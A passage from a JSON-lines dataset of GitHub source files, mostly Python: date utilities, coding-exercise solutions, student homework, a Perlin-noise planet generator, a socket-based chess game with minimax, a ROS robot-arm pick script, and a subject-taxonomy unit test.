\"%H:%M:%S.%f%z\", \"00:00:00.000Z\"\n else:\n pattern, reset_hour = \"%H:%M:%S%z\", \"00:00:00Z\"\n weekdate = weekdatetime.split(\"T\")[0]\n (iso_year, iso_week, iso_day, tz) = \\\n read_iso_week_date(weekdate, tz=False)\n time = custom_strptime(weekdatetime.split(\"T\")[1], pattern)\n only_time = time - custom_strptime(reset_hour, pattern)\n return iso_year, iso_week, iso_day, only_time\n\ndef weekdate(iso_year, iso_week, iso_weekday):\n # Input format: 1969W291\n weekdate = str(iso_year) + \"W\" + str(iso_week).zfill(2)\n weekdate += str(iso_weekday)\n return weekdate\n\ndef date_from_week(week, iso_day=0):\n iso_format = \"%Y-%m-%d\"\n return custom_strptime(week.day(iso_day-1).isoformat(), iso_format)\n","repo_name":"kolron/cloud_project","sub_path":"venv/Lib/site-packages/bigml_chronos/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72680427666","text":"# -*- mode: python -*-\n\n#\n# Creates an .exe for the windows spotify version which has no dependencies\n# (ie. python and the python packages are all included)\n# To run this script and build you must first install pyinstall and download\n# python and all the dependencies. It must be run on windows.\n\ndef extra_datas(mydir):\n def rec_glob(p, files):\n import os\n import glob\n for d in glob.glob(p):\n if os.path.isfile(d):\n files.append(d) \n rec_glob(\"%s/*\" % d, files)\n files = []\n rec_glob(\"%s/*\" % mydir, files)\n extra_datas = []\n for f in files:\n extra_datas.append((f, f, 'DATA'))\n return extra_datas\n\na = Analysis(['swisher\\winbox.py'],\n pathex=['swisher'],\n hiddenimports=[],\n hookspath=None)\n\na.datas += extra_datas('swisher\\\\templates')\na.datas += extra_datas('swisher\\\\assets')\na.datas += extra_datas('swisher\\\\winresources')\na.datas += extra_datas('mpd-0.17.4-win32')\n\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=1,\n name=os.path.join('build\\\\pyi.win32\\\\swisher', 'swisher.exe'),\n debug=False,\n strip=None,\n upx=True,\n icon='swisher\\\\winresources\\\\icon.ico',\n console=False )\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=None,\n upx=True,\n name=os.path.join('dist', 'swisher'))\n","repo_name":"thomasrynne/swisher","sub_path":"windows-build.spec","file_name":"windows-build.spec","file_ext":"spec","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"1042521354","text":"'''\nAuthor: Vladimir Vons \nCreated: 2022.09.04\nLicense: GNU, see LICENSE for more details\nDescription:\n'''\n\n\n#from .Sys_files import TApi as TApiEx\nfrom IncP.Api import TApiBase\nfrom IncP.Api.Sys_files import TApi as TApiEx\n\n\nclass TApi(TApiBase):\n Param = {\n 'path': '/'\n }\n\n async def Exec(self, aPath: str) -> str:\n Res = []\n ApiEx = TApiEx()\n Data = await ApiEx.Exec(aPath)\n for x in Data:\n Res.append('%s' % (x, x))\n return '
'.join(Res)\n\n async def Query(self, aData: dict) -> str:\n return await self.ExecDef(aData, ['path'])\n","repo_name":"VladVons/mpy-vRelay","sub_path":"src/IncP/Api/Sys_files_ls.py","file_name":"Sys_files_ls.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"464628725","text":"import collections\nfrom typing import List\n\n\ndef singleNumber(nums: List[int]) -> List[int]:\n counter = collections.Counter(nums)\n return [num for num, cnt in counter.items() if cnt == 1]\n\n\nif __name__ == \"__main__\":\n nums = [1, 2, 1, 3, 2, 5]\n result = singleNumber(nums)\n correct_result = [3, 5]\n print(\"Expected:\")\n print(correct_result)\n print(\"Output:\")\n print(result)\n","repo_name":"giwankim/algo","sub_path":"leetcode/260-single-number-3/single_number.py","file_name":"single_number.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70052974225","text":"# Find All Anagrams in a String\n\"\"\"\n Create a counter for p string and go through the s string for n - m + 1 ie(len(s)-len(p)+1) times\n construct a window of len(p) size in S string and then create another counter of that window after that compare,\n if both counters are equal then add the index of S string in our ans or\n else remove the very first element of the window and add next element of S string to that window by this we'll maintain the size of the window\n\"\"\"\n\n# Time Complexity = O(n), n = len(s)\n# Space Complexity = O(m), m = len(p)\n\n\ns = \"cbaebabacd\"\np = \"abc\"\n\n\nfrom typing import Counter\n\n\ndef findAnagrams(s, p):\n n = len(s)\n m = len(p)\n ans = []\n p = Counter(p)\n\n for i in range(n - m + 1):\n if i == 0:\n count = Counter(s[:m])\n else:\n count[s[i - 1]] -= 1\n count[s[i + m - 1]] += 1\n\n if p == count:\n ans.append(i)\n\n return ans\n\n\nprint(findAnagrams(s, p))\n","repo_name":"DivyanshiChouksey/Data-Structure-Algorithm","sub_path":"112.Find All Anagrams in a String.py","file_name":"112.Find All Anagrams in a String.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4240035591","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 25 23:36:38 2020\n\n@author: nia\n\"\"\"\n#відображення прямокутника\ndef scquare(a, b):\n print ('scquare(%s, %s)' % (a, b))\n \n print('*' *b)\n for i in range(a-2):\n print('*'+ ' '*(b-2)+ '*')\n \n print('*' * b)\n\n#відображення трикутника\n\ndef triangle(a,b):\n print ('triangle(%s, %s)' % (a, b))\n print('*')\n m=(b//(a-1))\n for i in range(1, a-1):\n print('*'*(i*m))\n print('*'*(b))\n \n \n \n\na=''\nwhile not a.isdigit ():\n a=input('Введіть а= ')\na=int(a)\nb=''\nwhile not b.isdigit ():\n b=input('Введіть b= ')\nb=int(b)\ns=scquare(a, b)\nv=triangle(a,b)\n\n\n","repo_name":"scretch28/ITEA","sub_path":"hw_3.py","file_name":"hw_3.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14423851183","text":"menu = \"\"\"\n BANCO MEGASMART\n______________________\n| |\n|[1] Depositar |\n|[2] Sacar |\n|[3] Extrato |\n|[4] Ajuda |\n|[0] Sair |\n|____________________|\n\n| Digite sua opção:\n| => \"\"\"\n\nsaldo = 0\nlimite = 500\nextrato = \"\"\nnumero_saques = 0\nLIMITE_SAQUES = 3\n\nwhile True:\n\n opcao = int(input(menu))\n\n if opcao == 1:\n valor = float(input(\"\\n|Informe o valor do depósito: \"))\n\n if valor > 0:\n saldo += valor\n extrato += f\"Depósito: R$ {valor:.2f}\\n\"\n \n else:\n print(\"|Falha na operação! Valor inválido.|\")\n\n elif opcao == 2:\n valor = float(input(\"|Informe o valor do saque: \"))\n\n excedeu_saldo = valor > saldo\n excedeu_limite = valor > limite\n excedeu_saques = numero_saques >= LIMITE_SAQUES\n\n if excedeu_saldo:\n print('\\n|Falha na operação! Saldo insuficiente.|')\n elif excedeu_limite:\n print('\\n|Falha na operação! Limite de saque excedido.|')\n elif excedeu_saques:\n print('\\n|Falha na operação! Número máximo de saques excedido.|')\n elif valor > 0:\n saldo -= valor\n extrato += f\"Saque: R$ {valor:.2f}\\n\"\n numero_saques += 1\n else:\n print('|Falha na operação! O valor informado é inválido|')\n \n elif opcao == 3:\n print('\\n================ EXTRATO ================')\n print('Não foram realizadas movimentações.' if not extrato else extrato)\n print('_________________________________________')\n print(f'\\nSaldo: R$ {saldo:.2f}') \n print('=========================================')\n \n elif opcao == 4:\n print('================================================')\n print('Informações')\n print('1. Valor máximo do saque: R$ 500.00')\n print('2. Quantidade máxima de saques: 3 saques por dia')\n print('=> Para mais informações contate o seu gerente')\n print('================================================')\n\n elif opcao == 0:\n break\n \n else:\n print('|Operação inválida, por favor selecione novamente a operação desejada.|')\n\n","repo_name":"joemily/sistema-bancario-simples-dio","sub_path":"projeto.py","file_name":"projeto.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41489385568","text":"import PIL, random, sys, argparse, math\nfrom PIL import Image, ImageDraw\nimport noise\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--width\", default=1500, type=int)\n parser.add_argument(\"--height\", default=1500, type=int)\n parser.add_argument(\"-s\", \"--scale\", default=200.0, type=float)\n parser.add_argument(\"-o\", \"--octaves\", default=6, type=int)\n parser.add_argument(\"-p\", \"--persistence\", default=.5, type=float)\n parser.add_argument(\"-l\", \"--lacunarity\", default=2.0, type=float)\n parser.add_argument(\"-b\", \"--base\", default=0, type=int)\n parser.add_argument(\"-md\", \"--max_distance\", default=900.0, type=float)\n parser.add_argument(\"-a\", \"--alter\", default=0, type=int)\n parser.add_argument(\"-pnw\", \"--planet_number_wide\", default=1, type=int)\n parser.add_argument(\"-pnh\", \"--planet_number_high\", default=1, type=int)\n parser.add_argument(\"-ps\", \"--planet_size\", default=1500, type=int)\n parser.add_argument(\"-oc\", \"--other_color\", default=0, type=int)\n args = parser.parse_args()\n\n random.seed()\n offset = random.randint(1, 100) * random.randint(1, 1000)\n\n width, height = args.width, args.height\n octaves = args.octaves\n persistence = args.persistence\n lacunarity = args.lacunarity\n scale = args.scale\n base = args.base\n alter = args.alter\n max_distance = args.max_distance\n planet_number_wide = args.planet_number_wide\n planet_number_high = args.planet_number_high\n planet_size = args.planet_size\n other_color = args.other_color\n\n pil_image = Image.new('RGBA', (planet_number_wide*planet_size, planet_number_high*planet_size))\n\n pixels = pil_image.load()\n # var rand = myArray[Math.floor(Math.random() * myArray.length)];\n # document.getElementById(\"color-text\").style.color = rand;\n colors_list = [(127, 199, 175), (218, 216, 167), (167, 219, 216), (237, 118, 112)]\n\n for col in range(pil_image.size[0]):\n for row in range(pil_image.size[1]):\n pixels[col, row] = (208, 200, 176)\n\n for col in range(0, pil_image.size[0], planet_size):\n for row in range(0, pil_image.size[1], planet_size):\n color_water = random.choice(colors_list)\n color_ground = random.choice(colors_list)\n while color_ground is color_water:\n color_ground = random.choice(colors_list)\n other_color = random.choice(colors_list)\n while other_color is color_water or other_color is color_ground:\n other_color = random.choice(colors_list)\n for i in range(col, col+planet_size):\n for j in range(row, row+planet_size):\n\n # Generates a value from -1 to 1\n pixel_value = noise.pnoise2((offset+i)/scale,\n (offset+j)/scale,\n octaves,\n persistence,\n lacunarity,\n width,\n height,\n base)\n distance_from_center = math.sqrt(math.pow((i - (col+(col+planet_size))/2), 2) + math.pow((j - (row+(row+planet_size))/2), 2))\n\n\n gradient_perc = distance_from_center/max_distance\n\n #pixel_value -= math.pow(gradient_perc, 3)\n #random.seed()\n\n if (distance_from_center < max_distance):\n if (other_color == 1 and int(pixel_value * 100.0) > 25):\n pixels[i, j] = other_color\n elif (int(pixel_value * 100.0) > 5):\n pixels[i, j] = color_ground\n else:\n pixels[i, j] = color_water\n elif (distance_from_center < (max_distance + .03 * max_distance)):\n pixels[i, j] = (15, 15, 15)\n\n #region = pil_image.crop((500, 500, 1000, 1000))\n #pil_image.paste(region, (0, 0, 500, 500))\n pil_image.save('Examples/Planet-' + str(offset) + '-w-' + str(width) + '-h-' + str(height) + '.png')\n\n\nif __name__ == \"__main__\":\n main()\n\n # 52 minutes - Definitely my maybe\n # -> 1:07\n\n # watch endsceen -> credits\n","repo_name":"erdavids/Island-Generator","sub_path":"PlanetPerlin.py","file_name":"PlanetPerlin.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"42569493346","text":"import chess\nimport chess.svg\nimport random\nimport math\nfrom PyQt5.QtSvg import QSvgWidget\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\nimport os\nimport sys\nimport timeit\n\nimport socket\n\n\nBUFFER_SIZE = 1024\n\n\nclass MainWindow(QWidget):\n def __init__(self, AIStart, socket: socket):\n super().__init__()\n self.boardSize = 800\n self.setGeometry(0, 0, self.boardSize, self.boardSize)\n self.AIStart = AIStart\n self.widgetSvg = QSvgWidget(parent=self)\n self.widgetSvg.setGeometry(0, 0, self.boardSize, self.boardSize)\n self.chessboard = chess.Board()\n self.chessboardSvg = chess.svg.board(self.chessboard).encode(\"UTF-8\")\n self.widgetSvg.load(self.chessboardSvg)\n self.chessMove = \"\"\n self.running = False\n self.socket = socket\n\n # self.revertMoveButton = QPushButton(text=\"Revert\")\n # self.revertMoveButton.move(900, 100)\n\n def mousePressEvent(self, event):\n if self.running:\n return\n if not self.AIStart:\n self.running = True\n if humanMove(self, event):\n AIMove(self.chessboard, self.deph, self)\n\n self.AIsTurn = False\n self.running = False\n else:\n self.running = True\n if (humanMove(self, event)):\n AIMove(self.chessboard, self.deph, self)\n self.running = False\n\n\ndef AIMove(chessboard: chess.Board, window: MainWindow):\n print(\"Receiving\")\n\n received = window.socket.recv(BUFFER_SIZE)\n print(\"Got: \" + received)\n makeMove(chess.Move.from_uci(str(received), window))\n\n\ndef humanMove(self, event):\n if self.chessMove == \"\":\n self.chessMove = getSquare(\n event, (self.boardSize*0.075)/2, self.boardSize - (self.boardSize*0.075)/2)\n return False\n elif len(self.chessMove) == 2:\n self.chessMove = self.chessMove + \\\n getSquare(event, (self.boardSize*0.075)/2,\n self.boardSize - (self.boardSize*0.075)/2)\n\n if not legalMove(window.chessboard, self.chessMove):\n print(\"Invalid move\", self.chessMove)\n self.chessMove = \"\"\n return False\n\n # Human move\n print(\"Human move :\", self.chessMove)\n if len(list(self.chessboard.legal_moves)) == 0:\n print(\"White lost\")\n return False\n self.socket.send(self.chessMove)\n makeMove(chess.Move.from_uci(str(self.chessMove)), window)\n self.chessMove = \"\"\n return True\n\n\ndef getSquare(event, lowest, highest):\n separation = (highest - lowest) / 8\n x = event.pos().x()\n y = event.pos().y()\n y_line = get_column_letter(x, lowest, highest, separation)\n x_line = get_row_number(y, lowest, highest, separation)\n return y_line + str(x_line)\n\n\ndef get_column_letter(x, lowest, highest, separation):\n for i in range(0, 8):\n if x > lowest and x < highest and x > lowest and x < highest and x > lowest + separation * i and x < lowest + separation * (i + 1):\n return chr(97 + i)\n return \"\"\n\n\ndef get_row_number(y, lowest, highest, separation):\n for i in range(0, 8):\n if y > lowest and y < highest and y > lowest and y < highest and y > lowest + separation * i and y < lowest + separation * (i+1):\n return 8-i\n return \"\"\n\n\ndef makeMove(move: chess.Move, window: MainWindow):\n window.chessboard.push(chess.Move(\n from_square=move.from_square, to_square=move.to_square))\n\n if window.chessboard.is_check():\n window.chessboardSvg = chess.svg.board(\n window.chessboard,\n lastmove=move,\n check=window.chessboard.king(window.chessboard.turn)\n ).encode(\"UTF-8\")\n else:\n window.chessboardSvg = chess.svg.board(\n window.chessboard,\n lastmove=move,\n check=None\n ).encode(\"UTF-8\")\n window.widgetSvg.load(window.chessboardSvg)\n # window.update()\n window.repaint()\n\n\ndef evaluationFunction(board: chess.Board):\n\n if chess.Board.is_fifty_moves(board) or chess.Board.is_repetition(board):\n if board.turn == chess.WHITE:\n return 500\n else:\n return -500\n\n if len(list(board.legal_moves)) == 0:\n if board.turn == chess.BLACK:\n return -1000\n elif board.turn == chess.WHITE:\n return 1000\n\n pawnDiff = calcPieceDiff(chess.PAWN, board)\n knightDiff = calcPieceDiff(chess.KNIGHT, board) * 3\n bishopDiff = calcPieceDiff(chess.BISHOP, board) * 3\n rookDiff = calcPieceDiff(chess.ROOK, board) * 5\n queenDiff = calcPieceDiff(chess.QUEEN, board) * 9\n return pawnDiff + knightDiff + bishopDiff + rookDiff + queenDiff\n\n\ndef calcPieceDiff(piece: chess.PieceType, board: chess.Board) -> int:\n return len(chess.Board.pieces(board, piece, chess.BLACK)) - len(chess.Board.pieces(board, piece, chess.WHITE))\n\n# Could add checks\n\n\ndef sortMoveList(moves: chess.LegalMoveGenerator, board: chess.Board):\n attackers = []\n attackers_value = []\n nonAttackers = []\n for move in moves:\n valBefore = evaluationFunction(board=board)\n board.push(move)\n valafter = evaluationFunction(board=board)\n board.pop()\n if valBefore != valafter:\n # if len(attackers) > 1 :\n # diff = abs(valBefore - valafter)\n # for i in range(0, len(attackers)):\n # if diff > attackers_value[i]:\n # attackers_value.insert(i, diff)\n # attackers.insert(i, move)\n # break\n attackers.append(move)\n # attackers_value.append(diff)\n else:\n nonAttackers.append(move)\n\n return (attackers, nonAttackers)\n\n\ndef minMax(board: chess.Board, depth: int, prevMove: chess.Move, alpha: int, beta: int):\n\n result = sortMoveList(board.legal_moves, board)\n attackMoves = result[0]\n noAttackMoves = result[1]\n\n sortedMoves = []\n # Quiescence base case\n if depth == -1:\n value = (prevMove, evaluationFunction(board=board))\n if (value == 1000):\n print(\"is 1000 1\")\n return value\n # Regular base case\n elif depth == 0 or len(attackMoves) + len(noAttackMoves) == 0 or chess.Board.is_fifty_moves(board) or chess.Board.is_repetition(board):\n value = (prevMove, evaluationFunction(board=board))\n if (value == 1000):\n print(\"is 1000 1\")\n return value\n # Quiescence continuation\n elif depth == 0 and len(attackMoves) != 0:\n sortedMoves = attackMoves\n # Regular continuation\n elif depth != 0 and len(attackMoves) + len(noAttackMoves) != 0:\n # Makes the algorithm pick attacks first\n sortedMoves = attackMoves + noAttackMoves\n else:\n print(\"WTF\")\n exit()\n\n # MAX\n if board.turn == chess.BLACK:\n value = -998\n bestMov = prevMove\n for mov in sortedMoves:\n board.push(mov)\n currentVal = minMax(board=board, depth=depth-1,\n prevMove=mov, alpha=alpha, beta=beta)[1]\n board.pop()\n if currentVal > value:\n value = currentVal\n bestMov = mov\n alpha = max(alpha, value)\n if value >= beta:\n break\n return (bestMov, value)\n # MIN\n elif board.turn == chess.WHITE:\n value = 999\n bestMov = prevMove\n for mov in sortedMoves:\n board.push(mov)\n currentVal = minMax(board=board, depth=depth-1,\n prevMove=mov, alpha=alpha, beta=beta)[1]\n board.pop()\n if currentVal < value:\n value = currentVal\n bestMov = mov\n beta = min(beta, value)\n if currentVal <= alpha:\n break\n\n return (bestMov, value)\n\n\ndef legalMove(board: chess.Board, move: str):\n found = False\n for m in list(board.legal_moves):\n mov_con = str(chess.Move.from_uci(str(m)))\n if move == mov_con:\n found = True\n break\n return found\n\n\nif __name__ == \"__main__\":\n\n TCP_IP = '192.168.10.158'\n TCP_PORT = 3030\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((TCP_IP, TCP_PORT))\n s.listen(1)\n\n conn, addr = s.accept()\n print('Connection address:', addr)\n\n app = QApplication([])\n AIstart = False\n if sys.argv[1] == \"white\":\n AIstart = True\n window = MainWindow(AIStart=AIstart, socket=conn)\n window.show()\n app.exec()\n","repo_name":"EliasNorgren/chessABalgo","sub_path":"GUIServer.py","file_name":"GUIServer.py","file_ext":"py","file_size_in_byte":8532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16803675277","text":"from random import *\n\n\ndef task1():\n n, m = 1, randint(1, 100)\n print(n, m)\n for i in range(m):\n print(1, randint(-2, -1))\n\n\ndef task2():\n n, m = randint(2, 20), randint(90, 100)\n print(n, m)\n for i in range(m):\n a = randint(1, n)\n b = randint(-2, 0)\n if b == 0:\n b = randint(1, n-1)\n if b>=a:\n b = b+1\n print(a, b)\n\n\ntask1()\n","repo_name":"learnpm/code","sub_path":"apcs/10907/p2_testcases/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"72797624147","text":"'''Faça um programa que permita ao usuário digitar o seu nome e em seguida mostre o nome do usuário de trás para frente utilizando somente letras maiúsculas e, OBRIGATORIAMENTE, **comando de repetição**. Dica: lembre−se que ao informar o nome o usuário pode digitar letras maiúsculas ou minúsculas.'''\r\n\r\ndef main():\r\n #declaração de variáveis\r\n nome = str(\"\")\r\n invertido = str(\"\")\r\n \r\n #entrada de dados\r\n nome = input().upper()\r\n \r\n #processamento\r\n for i in nome:\r\n invertido = nome[-1::-1]\r\n \r\n #saída de dados\r\n print(f'{invertido}') \r\n return 0\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"saraivagustavo/LVPs","sub_path":"LVPs-Strings/lvpstrings2.py","file_name":"lvpstrings2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1986988493","text":"import sys\n\nfrom rich.console import Console\n\nfrom ..enums.terminal_out_file import TerminalOutFile\n\nRICH_CONSOLE: dict[TerminalOutFile, Console] = {}\n\n\ndef get_rich_console(out_file: TerminalOutFile, width: int, force_terminal: bool) -> Console:\n \"\"\"\n Get rich console, create if not exists\n\n :param out_file: terminal out file\n :param width: terminal width\n :param force_terminal: force terminal\n :return: rich console\n \"\"\"\n\n global RICH_CONSOLE\n\n # check if rich console exists\n if out_file not in RICH_CONSOLE:\n # choose file\n if out_file == TerminalOutFile.STDOUT:\n file = sys.stdout\n elif out_file == TerminalOutFile.STDERR:\n file = sys.stderr\n else:\n file = sys.stderr\n\n # create rich console\n RICH_CONSOLE[out_file] = Console(file=file,\n force_terminal=force_terminal,\n width=width)\n\n rich_handler = RICH_CONSOLE[out_file]\n\n return rich_handler\n","repo_name":"JuliusKoenig/controllogger","sub_path":"src/controllogger/misc/get_rich_console.py","file_name":"get_rich_console.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73103877904","text":"#!/usr/bin/env python3\n\nfrom putarm_ur3e_utils.srv import GrabObj, GrabObjResponse\nfrom putarm_ur3e_utils.srv import GoHome, GoHomeResponse\nfrom putarm_ur3e_utils.srv import GoToObj,GoToObjResponse\nimport sys\nimport copy\nimport rospy\nimport geometry_msgs.msg\nfrom math import pi\nfrom std_msgs.msg import String\nfrom ur_msgs.srv import SetIO\nimport geometry_msgs\nimport message_filters\nimport tf\n\nimport numpy as np\nimport rosservice\n\ngrab_prox = rospy.ServiceProxy(\"/grab_object_server\", GrabObj)\nhome_prox = rospy.ServiceProxy(\"/go_home_server\", GoHome)\ngoto_prox = rospy.ServiceProxy(\"/goto_object_server\",GoToObj)\n\npose_1 = geometry_msgs.msg.Pose()\npose_1.position.x = 0.1\npose_1.position.y = 0.79\npose_1.position.z = 0.50\npose_1.orientation.x = 0.0\npose_1.orientation.y = 0.9999997\npose_1.orientation.z = 0.0\npose_1.orientation.w = 0.0007963\n\npose_1_b = geometry_msgs.msg.Pose()\npose_1_b.position.x = 0.1\npose_1_b.position.y = 0.79\npose_1_b.position.z = 0.42\npose_1_b.orientation.x = 0.0\npose_1_b.orientation.y = 0.9999997\npose_1_b.orientation.z = 0.0\npose_1_b.orientation.w = 0.0007963\n\npose_2 = geometry_msgs.msg.Pose()\npose_2.position.x = -0.1\npose_2.position.y = 0.79\npose_2.position.z = 0.50\npose_2.orientation.x = 0.0\npose_2.orientation.y = 0.9999997\npose_2.orientation.z = 0.0\npose_2.orientation.w = 0.0007963\n\npose_2_b = geometry_msgs.msg.Pose()\npose_2_b.position.x = -0.1\npose_2_b.position.y = 0.79\npose_2_b.position.z = 0.42\npose_2_b.orientation.x = 0.0\npose_2_b.orientation.y = 0.9999997\npose_2_b.orientation.z = 0.0\npose_2_b.orientation.w = 0.0007963\n\nwait_delay = 0.2\n\ndef main():\n rospy.init_node('scenario2')\n home_prox(angle_vector=[-60,-70,-90,-80,76,-152])\n grab_prox(pins=[16,17],states=[0,0])\n rospy.sleep(wait_delay)\n listener = tf.TransformListener()\n bottle_pose = geometry_msgs.msg.Pose()\n rate = rospy.Rate(10.0)\n counter = 30\n while counter>0:\n try:\n (trans,rot) = listener.lookupTransform('/world', '/bottle', rospy.Time(0))\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n continue\n\n #print(trans,rot)\n bottle_pose.position.x = trans[0]\n bottle_pose.position.y = trans[1]\n bottle_pose.position.z = trans[2]\n\n bottle_pose.orientation.x = rot[0]\n bottle_pose.orientation.y = rot[1]\n bottle_pose.orientation.z = rot[2]\n bottle_pose.orientation.w = rot[3]\n counter = counter - 1\n\n rate.sleep()\n\n print(bottle_pose)\n grab_prox(pins=[16,17],states=[0,0])\n home_prox(angle_vector=[-60,-70,-90,-80,76,-152])\n rospy.sleep(wait_delay)\n bottle_pose.position.z += 0.17\n goto_prox(object_coordinates=bottle_pose)\n rospy.sleep(wait_delay)\n bottle_pose.position.z -= 0.05\n goto_prox(object_coordinates=bottle_pose)\n grab_prox(pins=[16,17],states=[1,1])\n rospy.sleep(2*wait_delay)\n bottle_pose.position.z += 0.05\n goto_prox(object_coordinates=bottle_pose)\n rospy.sleep(wait_delay)\n home_prox(angle_vector=[-60,-70,-90,-80,76,-152])\n rospy.sleep(wait_delay)\n\n\nif __name__ == \"__main__\":\n main()\n\n# rosservice call /goto_object_service \"object_coordinates:\n# position:\n# x: 0.20\n# y: 0.69\n# z: 0.23\n# orientation:\n# x: 0.0\n# y: 0.9999997\n# z: 0.0\n# w: 0.0007963\"\n","repo_name":"filesmuggler/putarm_ur3e","sub_path":"putarm_ur3e_utils/scripts/scenarios/scenario2.py","file_name":"scenario2.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15204015743","text":"\"\"\"Workaround to break cyclic imports.\"\"\"\n\nAGS_NAME = 'average_genome_size'\nALPHA_DIV_NAME = 'alpha_diversity'\nANCESTRY_NAME = 'putative_ancestry'\nBETA_DIV_NAME = 'beta_diversity'\nCARD_AMR_NAME = 'card_amr_genes'\nFUNC_GENES_NAME = 'functional_genes'\nHMP_NAME = 'hmp'\nMACROBES_NAME = 'macrobe_abundance'\nMETHYLS_NAME = 'methyltransferases'\nMICROBE_DIR_NAME = 'microbe_directory'\nPATHWAYS_NAME = 'pathways'\nREAD_STATS_NAME = 'read_stats'\nREADS_CLASSIFIED_NAME = 'reads_classified'\nSAMPLE_SIMILARITY_NAME = 'sample_similarity'\nTAXA_TREE_NAME = 'taxa_tree'\nTAXON_ABUNDANCE_NAME = 'taxon_abundance'\nVFDB_NAME = 'virulence_factors'\nVOLCANO_NAME = 'volcano'\n\nALL_MODULE_NAMES = [\n AGS_NAME,\n ALPHA_DIV_NAME,\n ANCESTRY_NAME,\n BETA_DIV_NAME,\n CARD_AMR_NAME,\n FUNC_GENES_NAME,\n HMP_NAME,\n MACROBES_NAME,\n METHYLS_NAME,\n MICROBE_DIR_NAME,\n READ_STATS_NAME,\n PATHWAYS_NAME,\n READS_CLASSIFIED_NAME,\n SAMPLE_SIMILARITY_NAME,\n TAXA_TREE_NAME,\n TAXON_ABUNDANCE_NAME,\n VFDB_NAME,\n VOLCANO_NAME,\n]\n","repo_name":"MetaGenScope/metagenscope-server","sub_path":"app/analysis_results/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71200139986","text":"import logging\nimport StringIO\nimport unittest\nfrom django.utils import simplejson\n\n# Local imports\nfrom common import subjects\n\n_TEST_YAML = \"\"\"\nroot:\n - math\n - technology\n - communication\n - health\n - money\n - society\n - 'sports & recreation'\n - 'hobby'\n - 'misc'\n\ntechnology:\n - physics\n - chemistry\n - biology\n - geology\n - medicine\n - engineering\n\nengineering:\n - mechanical\n - electrical\n - chemical\n - aeronautical\n - genetic\n - 'software/computation'\n - food\n - textiles\n - education\n\n'software/computation':\n - 'introduction to computer programming'\n - 'algorithms & data structures'\n - 'abstraction'\n - 'programming languages'\n - 'operating systems'\n - 'compilers'\n - 'memory architectures and coping with latency'\n - 'data communication, networks and routing'\n\n'programming languages':\n - C\n - BASIC\n - C++\n - 'ECMAScript derivatives'\n - FORTRAN\n - Haskell\n - Python\n\"\"\"\n\n\nclass SubjectTaxonomyTest(unittest.TestCase):\n \"\"\"Tests the SubjectTaxonomy class.\"\"\"\n\n def testSimpleRoots(self):\n taxonomy = subjects.SubjectTaxonomy()\n rootIds = [\n 'math',\n 'technology',\n 'health',\n ]\n for rootId in rootIds:\n item = subjects.SubjectItem(rootId)\n taxonomy.AddSubject(item, None)\n\n self.assertEqual(3, len(taxonomy._roots))\n self.assertEqual('technology',\n taxonomy.GetSubject('technology').subject_id)\n\n def testYamlImport(self):\n stream = StringIO.StringIO(_TEST_YAML)\n taxonomy = subjects._GetSubjectsTaxonomyFromYaml(stream)\n\n self.assertEqual(9, len(taxonomy._roots))\n self.assertEqual('technology',\n taxonomy.GetSubject('technology').subject_id)\n self.assertEqual(6, len(taxonomy.GetChildSubjects('technology')))\n\n self.assertEqual('programming languages',\n taxonomy.GetParent('Python').subject_id)\n\n def testRootToDictOfRoot(self):\n stream = StringIO.StringIO(_TEST_YAML)\n taxonomy = subjects._GetSubjectsTaxonomyFromYaml(stream)\n\n result = subjects._ToDict(taxonomy, None, 1)\n self.assertTrue(isinstance(result, dict))\n self.assertEqual(1, len(result))\n self.assertEqual(9, len(result['root']))\n\n item = result['root'][7]\n self.assertEqual('hobby', item['i'])\n self.assertEqual(True, item['l'])\n\n def testRootToDict(self):\n stream = StringIO.StringIO(_TEST_YAML)\n taxonomy = subjects._GetSubjectsTaxonomyFromYaml(stream)\n\n result = subjects._ToDict(taxonomy, None, 2)\n self.assertTrue(isinstance(result, dict))\n self.assertEqual(2, len(result))\n self.assertEqual(9, len(result['root']))\n self.assertEqual(6, 